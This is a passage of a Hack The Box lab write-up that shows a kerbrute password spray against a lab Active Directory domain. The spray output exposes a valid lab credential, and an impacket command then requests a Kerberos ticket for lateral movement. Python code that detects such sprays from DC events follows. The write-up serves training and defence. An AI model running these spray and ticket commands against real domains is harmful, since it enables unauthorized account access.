sierra.frye


┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ for passwd in $(cat phished_passwds.txt); do kerbrute passwordspray --dc research.search.htb -d SEARCH.HTB ./phished_users.txt $passwd -t 40; done
 
[...REDACTED...]
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
version: v1.0.3 (9dad6e1) - 01/30/24 - Ronnie Flathers @ropnop
 
2024/01/30 20:51:13 >  Using KDC(s):
2024/01/30 20:51:13 >  	research.search.htb:88
 
2024/01/30 20:51:13 >  [+] VALID LOGIN:	 Sierra.Frye@SEARCH.HTB:$$49=wide=STRAIGHT=jordan=28$$18
2024/01/30 20:51:13 >  Done! Tested 14 logins (1 successes) in 0.120 seconds
 
[...REDACTED...]

Upon testing those uncovered cleartext credentials, a valid domain credential is found: sierra.frye:$$49=wide=STRAIGHT=jordan=28$$18. The user hasn't changed the password since the incident.

┌──(kali㉿kali)-[~/archive/htb/labs/search]
└─$ impacket-getTGT SEARCH.HTB/sierra.frye@research.search.htb -k -dc-ip $IP 
Impacket v0.11.0 - Copyright 2023 Fortra
 
password: $$49=wide=STRAIGHT=jordan=28$$18
[*] Saving ticket in sierra.frye@research.search.htb.ccache

The credential is validated and a TGT is generated. Lateral movement is made to the sierra.frye user.
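
Seen from the domain controller, the spray and the ticket request above appear as a burst of Kerberos pre-authentication failures (Security event 4771, failure code 0x18) across many accounts from one client address, with a TGT request (event 4768) among them. The detection logic below is an added example, not part of the original notes: the record layout, account names and addresses are constructed, and it assumes Kerberos authentication service auditing is enabled on the DC.

```python
from collections import defaultdict
from datetime import datetime, timedelta

BAD_PASSWORD = "0x18"   # 4771 failure code: pre-authentication failed, wrong password
SUCCESS = "0x0"         # 4768 result code: TGT issued

def build_sample():
    """Constructed records: (time, event id, account, client address, code)."""
    base = datetime(2024, 1, 30, 20, 51, 13)
    events = []
    for i in range(14):  # one source, 14 accounts inside ~0.1 s, one success
        ts = (base + timedelta(milliseconds=8 * i)).isoformat()
        if i == 7:
            events.append((ts, 4768, "user07", "192.0.2.10", SUCCESS))
        else:
            events.append((ts, 4771, f"user{i:02d}", "192.0.2.10", BAD_PASSWORD))
    # Benign contrast: one user mistypes twice from a workstation, then logs in.
    for sec, eid, code in [(0, 4771, BAD_PASSWORD), (9, 4771, BAD_PASSWORD), (20, 4768, SUCCESS)]:
        ts = (base + timedelta(seconds=sec)).isoformat()
        events.append((ts, eid, "user20", "192.0.2.77", code))
    return events

def detect_spray(events, window=timedelta(seconds=60), min_accounts=10):
    """Flag sources whose bad-password failures span >= min_accounts distinct
    accounts within `window`; report accounts that got a TGT from that source."""
    by_src = defaultdict(list)
    for ts, eid, account, src, code in events:
        by_src[src].append((datetime.fromisoformat(ts), eid, account.lower(), code))
    findings = {}
    for src, rows in by_src.items():
        rows.sort()
        fails = [(t, a) for t, eid, a, c in rows if eid == 4771 and c == BAD_PASSWORD]
        for i, (start, _) in enumerate(fails):
            burst = {a for t, a in fails[i:] if t - start <= window}
            if len(burst) < min_accounts:
                continue
            # A TGT issued to the same source around the burst marks the account to reset.
            hit = {a for t, eid, a, c in rows if eid == 4768 and c == SUCCESS
                   and abs(t - start) <= window}
            findings[src] = {"failed": burst, "succeeded": hit}
            break
    return findings

if __name__ == "__main__":
    for src, f in detect_spray(build_sample()).items():
        print(src, "sprayed", len(f["failed"]), "accounts; TGT issued for", sorted(f["succeeded"]))
```

Counting distinct accounts per source, rather than failures per account, is what separates a spray from a user mistyping a password; any account in the `succeeded` set needs an immediate password reset.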